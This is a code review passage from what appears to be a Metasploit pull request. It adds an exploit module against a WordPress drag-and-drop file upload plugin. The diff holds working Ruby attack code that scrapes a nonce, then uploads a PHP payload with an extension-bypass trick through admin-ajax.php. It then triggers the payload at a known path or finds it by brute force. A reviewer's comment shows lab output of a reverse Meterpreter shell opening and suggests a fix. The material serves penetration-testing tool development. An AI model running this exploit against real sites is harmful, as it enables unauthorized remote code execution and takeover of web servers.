modules/exploits/multi/http/wp_dnd_mul_file_rce.rb

```diff
@@ -0,0 +1,175 @@
+    rescue ::Rex::ConnectionError
+      vprint_error('Could not connect to the web service')
+      return CheckCode::Unknown
+    end
+    CheckCode::Safe
+  end
+
+  def exploit
+    vprint_status('Getting nonce')
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path)
+    )
+    unless res
+      fail_with(Failure::Unreachable, 'No server response')
+    end
+
+    if res.code != 200
+      fail_with(Failure::UnexpectedReply, 'Non-200 response, check targeturi')
+    end
+
+    /ajax_nonce":"(?<nonce>.{10})"/ =~ res.body
+    if nonce.nil?
+      fail_with(Failure::UnexpectedReply, 'Nonce not found')
+    end
+    print_status("Nonce: #{nonce}")
+
+    payload_name = "#{rand_text_alphanumeric(6..12)}.php"
+
+    data = Rex::MIME::Message.new
+    data.add_part('5242880', nil, nil, 'form-data; name="size_limit"')
+    data.add_part('php%', nil, nil, 'form-data; name="supported_type"')
+    data.add_part('dnd_codedropz_upload', nil, nil, 'form-data; name="action"')
+    data.add_part('click', nil, nil, 'form-data; name="type"')
+    data.add_part(nonce, nil, nil, 'form-data; name="security"')
+    data.add_part(payload.encoded, 'text/plain', nil, "form-data; name='upload-file'; filename='#{payload_name}%'")
+
+    # grab our valid cookie
+    cookie = res.get_cookies
+
+    vprint_status('Attempting payload upload')
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),
+      'method' => 'POST',
+      'cookie' => cookie,
+      'ctype' => "multipart/form-data; boundary=#{data.bound}",
+      'data' => data.to_s
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'No server response')
+    end
+
+    if res.code == 403
+      fail_with(Failure::UnexpectedReply, '403 response, nonce detection failed')
+    elsif res.code == 500
+      fail_with(Failure::UnexpectedReply, '500 response, server misconfigured, may need php-mbstring')
+    end
+    print_good('Payload uploaded successfully')
+    register_file_for_cleanup(payload_name)
+
+    # first we attempt to trigger the most obvious location of the payload.
+    print_status('Attempting to trigger at well known location')
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wp_dndcf7_uploads', 'wpcf7-files', payload_name)
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'No server response')
+    end
+
+    # dont need to check for 200, since that would have triggered our payload
+    if res.code != 200
+      print_status('Bruteforcing for payload to trigger')
+      find_payload(normalize_uri(target_uri.path, 'wp-content', 'uploads', '/'), payload_name)
+      unless @payload_location
+        fail_with(Failure::Unknown, 'Unable to determine uploaded shell path')
+      end
+      # lastly, if we have a location found, trigger it
+      send_request_cgi('uri' => @payload_location)
+    end
```

Comment:
Tested with the latest changes and kept getting this output:

```
msf5 exploit(multi/http/wp_dnd_mul_file_rce) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Nonce: 739944da12
[+] Payload uploaded successfully
[*] Attempting to trigger at well known location
[*] Sending stage (38288 bytes) to 192.168.37.137
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.137:36722) at 2020-06-04 09:35:43 -0500
[+] Deleted 6rcEb4C8ivQI.php
[-] Exploit aborted due to failure: unreachable: No server response
[*] Exploit completed, but no session was created.
```
A valid session is still established, but the response is not returning back. Wrapping the highlighted logic in an `unless session_created?...end` block fixes this. I can go ahead and make that change while landing, as the rest of the code looks fine to me.